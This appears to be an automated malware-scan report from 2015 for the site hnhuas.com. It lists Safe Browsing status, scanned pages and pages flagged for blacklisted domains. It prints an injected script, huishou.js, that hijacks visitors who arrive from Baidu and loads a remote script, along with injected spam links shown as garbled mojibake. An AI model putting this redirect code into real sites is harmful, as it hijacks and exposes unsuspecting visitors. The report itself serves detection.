Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hnhuas.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://hnhuas.com/ | HTTP/1.1 200 OK Date: Thu, 05 Mar 2015 00:44:11 GMT Accept-Ranges: bytes ETag: "1878b9aec614d01:5fc" Server: Microsoft-IIS/6.0 Content-Length: 32051 Content-Location: http://hnhuas.com/index.html Content-Type: text/html Last-Modified: Wed, 10 Dec 2014 22:14:36 GMT X-Powered-By: ASP.NET | clean |
http://hnhuas.com/index.html | 200 OK Content-Length: 32051 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: sjt-trade.com ...[2740 bytes skipped]... ://cdhtshm.com/home/" target="_blank">ÏÂÔØaƬÍøÕ¾2014</a></li> <li><a href="http://yesoongroup.com/down/" target="_blank">»ÆÉ«Âþ»</a></li> <li><a href="http://c-suncap.cn/sports/" target="_blank">ÃÀѨÈâ°ô</a></li> <li><a href="http://dldz-ln.com.cn" target="_blank">´óÁ¬ÊÐÂÃ˳µçÁ¦µç×ÓÉ豸ÓÐÏÞ¹«Ë¾</a></li> <li><a href="http://sjt-trade.com" target="_blank">·ðɽÊÐ˳¼ÎͨóÒ×ÓÐÏÞ¹«Ë¾</a></li> <li><a href="http://siliaoji.com.cn" target="_blank">ÕÂÇðÊÐÓîÁú»úеÓÐÏÞ¹«Ë¾</a></li> <li><a href="http://xzrhkj.com" target="_blank">ÉîÛÚÊÐÐÂÖÛÈÕ»¯¿Æ¼¼ÓÐÏÞ¹«Ë¾</a></li> <li><a href="http://lyatgs.com" target="_blank">ÂåÑô°²ÍØҤ¯»·±£ÓÐÏÞ¹«Ë¾</a></li> <li><a href="http://wxsysteel.com" target="_blank">ÎÞÎýË«ÔƲ»Ðâ¸Ö ...[1507 bytes skipped]... | ||
http://Js.lwtzdec.com/huishou.js | 200 OK Content-Length: 1063 Content-Type: application/x-javascript | suspicious |
Page code contains blacklisted domain: vip.hunlianyuan.com ...[596 bytes skipped]... ) > -1) { window.opener.location.href = url } else { window.opener.location.replace(url) } } }; var referer = document.referrer; if (!referer) { return }; var rst = /https?\:\/\/([^\/]+)/i.exec(referer); var host = rst ? rst[1] : 'unknown'; if (/baidu\.com$/i.test(host) && timeallow) { var search = referer.substring(referer.indexOf('?')); jump("http://vip.hunlianyuan.com/1.html"); return } })() } catch(e) {} document.write ('<script language="javascript" type="text/javascript" src="http://js.17meiliba.com/tan.js"></script>'); | ||
http://hnhuas.com/tj.js | 200 OK Content-Length: 0 Content-Type: application/x-javascript | clean |
http://hnhuas.com/sitemap.html | 200 OK Content-Length: 117012 Content-Type: text/html | clean |
http://hnhuas.com/6isl064106/ | HTTP/1.1 200 OK Date: Thu, 05 Mar 2015 00:44:17 GMT Accept-Ranges: bytes ETag: "a854572ac55d01:5fc" Server: Microsoft-IIS/6.0 Content-Length: 13886 Content-Location: http://hnhuas.com/6isl064106/index.html Content-Type: text/html Last-Modified: Fri, 21 Nov 2014 19:55:57 GMT X-Powered-By: ASP.NET | clean |
http://hnhuas.com/6isl064106/index.html | 200 OK Content-Length: 13886 Content-Type: text/html | clean |
http://hnhuas.com/include/dedeajax2.js | HTTP/1.1 200 OK Date: Thu, 05 Mar 2015 00:44:19 GMT Accept-Ranges: bytes ETag: "f0e8c67c11d01:5fc" Server: Microsoft-IIS/6.0 Content-Length: 1548 Content-Location: http://hnhuas.com/404.html?404;http://hnhuas.com:80/include/dedeajax2.js Content-Type: text/html Last-Modified: Sat, 15 Nov 2014 18:25:09 GMT X-Powered-By: ASP.NET | clean |
http://hnhuas.com/404.html?404;http://hnhuas.com:80/include/dedeajax2.js | 200 OK Content-Length: 1548 Content-Type: text/html | clean |
http://www.qq.com/404/search_children.js | 200 OK Content-Length: 295 Content-Type: application/javascript | clean |
http://js.users.51.la/17453581.js | 200 OK Content-Length: 1930 Content-Type: application/x-javascript | clean |
http://hnhuas.com/test404page.js | HTTP/1.1 200 OK Date: Thu, 05 Mar 2015 00:44:21 GMT Accept-Ranges: bytes ETag: "f0e8c67c11d01:5fc" Server: Microsoft-IIS/6.0 Content-Length: 1548 Content-Location: http://hnhuas.com/404.html?404;http://hnhuas.com:80/test404page.js Content-Type: text/html Last-Modified: Sat, 15 Nov 2014 18:25:09 GMT X-Powered-By: ASP.NET | clean |
http://hnhuas.com/404.html?404;http://hnhuas.com:80/test404page.js | 200 OK Content-Length: 1548 Content-Type: text/html | clean |
http://hnhuas.com/include/ckeditor/ckeditor.js?t=B8DJ5M3 | HTTP/1.1 200 OK Date: Thu, 05 Mar 2015 00:44:22 GMT Accept-Ranges: bytes ETag: "f0e8c67c11d01:5fc" Server: Microsoft-IIS/6.0 Content-Length: 1548 Content-Location: http://hnhuas.com/404.html?404;http://hnhuas.com:80/include/ckeditor/ckeditor.js?t=B8DJ5M3 Content-Type: text/html Last-Modified: Sat, 15 Nov 2014 18:25:09 GMT X-Powered-By: ASP.NET | clean |
http://hnhuas.com/404.html?404;http://hnhuas.com:80/include/ckeditor/ckeditor.js?t=b8dj5m3 | 200 OK Content-Length: 1548 Content-Type: text/html | clean |
http://hnhuas.com/p06m75544105/ | HTTP/1.1 200 OK Date: Thu, 05 Mar 2015 00:44:23 GMT Accept-Ranges: bytes ETag: "5336d127c55d01:5fc" Server: Microsoft-IIS/6.0 Content-Length: 13828 Content-Location: http://hnhuas.com/p06m75544105/index.html Content-Type: text/html Last-Modified: Fri, 21 Nov 2014 19:55:52 GMT X-Powered-By: ASP.NET | clean |
http://hnhuas.com/p06m75544105/index.html | 200 OK Content-Length: 13828 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: zzlantu.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>¡¾ÐÁ¼Òϱ¸¾¡¿ÒùÂÒ¾õÐѱ±´¨Í«-ÏãÛàÃÀÓÅktrd117-Ö£ÖÝ»ªÊ¢¹¤ÒÕ²£Á§³§</title> <meta name="keywords" content="ÐÁ¼Òϱ¸¾,ÒùÂÒ¾õÐѱ±´¨Í«,ÏãÛàÃÀÓÅktrd11 ...[4609 bytes skipped]... | ||
http://hnhuas.com/1wcyu91133923/ | HTTP/1.1 200 OK Date: Thu, 05 Mar 2015 00:44:25 GMT Accept-Ranges: bytes ETag: "78d9b7d9c25d01:5fc" Server: Microsoft-IIS/6.0 Content-Length: 14175 Content-Location: http://hnhuas.com/1wcyu91133923/index.html Content-Type: text/html Last-Modified: Fri, 21 Nov 2014 19:39:22 GMT X-Powered-By: ASP.NET | clean |
http://hnhuas.com/1wcyu91133923/index.html | 200 OK Content-Length: 14175 Content-Type: text/html | clean |
http://hnhuas.com/5fh9krm113028/ | HTTP/1.1 200 OK Date: Thu, 05 Mar 2015 00:44:26 GMT Accept-Ranges: bytes ETag: "a2f8b02ccf4d01:5fc" Server: Microsoft-IIS/6.0 Content-Length: 14077 Content-Location: http://hnhuas.com/5fh9krm113028/index.html Content-Type: text/html Last-Modified: Thu, 20 Nov 2014 14:35:04 GMT X-Powered-By: ASP.NET | clean |
http://hnhuas.com/5fh9krm113028/index.html | 200 OK Content-Length: 14077 Content-Type: text/html | clean |
http://hnhuas.com/ig82c441264/ | HTTP/1.1 200 OK Date: Thu, 05 Mar 2015 00:44:28 GMT Accept-Ranges: bytes ETag: "e8e0d0c22d3d01:5fc" Server: Microsoft-IIS/6.0 Content-Length: 14180 Content-Location: http://hnhuas.com/ig82c441264/index.html Content-Type: text/html Last-Modified: Tue, 18 Nov 2014 12:47:07 GMT X-Powered-By: ASP.NET | clean |
http://hnhuas.com/ig82c441264/index.html | 200 OK Content-Length: 14180 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 0434xxg.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>appÊÇʲôµ¥Î»|¹úÍâ²¥µÄÖйúµçÊÓ¾ç|º£ÐÅ¿ìÃÅ3dµçÓ°-Ö£ÖÝ»ªÊ¢¹¤ÒÕ²£Á§³§</title> <meta name="keywords" content="appÊÇʲôµ¥Î»,¹úÍâ²¥µÄÖйúµçÊÓ¾ç, ...[4576 bytes skipped]... | ||
http://hnhuas.com/u30xlaf12587/ | HTTP/1.1 200 OK Date: Thu, 05 Mar 2015 00:44:30 GMT Accept-Ranges: bytes ETag: "2eacfd54303d01:5fc" Server: Microsoft-IIS/6.0 Content-Length: 13426 Content-Location: http://hnhuas.com/u30xlaf12587/index.html Content-Type: text/html Last-Modified: Tue, 18 Nov 2014 13:05:31 GMT X-Powered-By: ASP.NET | clean |
http://hnhuas.com/u30xlaf12587/index.html | 200 OK Content-Length: 13426 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: ykhengfei.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>×¢²á½ø³ö¿Ú¹«Ë¾Ê±¼ä-Ææ¹ÖµÄËýѸÀ×µØÖ·ÈâÄ©ÇÑ×ÓµÄ×ö·¨-Ö£ÖÝ»ªÊ¢¹¤ÒÕ²£Á§³§</title> <meta name="keywords" content="×¢²á½ø³ö¿Ú¹«Ë¾Ê±¼ä,Ææ¹ÖµÄËýѸÀ×µ ...[4583 bytes skipped]... |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hnhuas.com
Result:
HTTP/1.1 200 OK
Date: Thu, 05 Mar 2015 00:44:11 GMT
Accept-Ranges: bytes
ETag: "1878b9aec614d01:5fc"
Server: Microsoft-IIS/6.0
Content-Length: 32051
Content-Location: http://hnhuas.com/index.html
Content-Type: text/html
Last-Modified: Wed, 10 Dec 2014 22:14:36 GMT
X-Powered-By: ASP.NET
...32051 bytes of data.
GET / HTTP/1.1
Host: hnhuas.com
Result:
HTTP/1.1 200 OK
Date: Thu, 05 Mar 2015 00:44:11 GMT
Accept-Ranges: bytes
ETag: "1878b9aec614d01:5fc"
Server: Microsoft-IIS/6.0
Content-Length: 32051
Content-Location: http://hnhuas.com/index.html
Content-Type: text/html
Last-Modified: Wed, 10 Dec 2014 22:14:36 GMT
X-Powered-By: ASP.NET
...32051 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: hnhuas.com
Referer: http://www.google.com/search?q=hnhuas.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: hnhuas.com
Referer: http://www.google.com/search?q=hnhuas.com
Result:
The result is similar to the first query. There are no suspicious redirects found.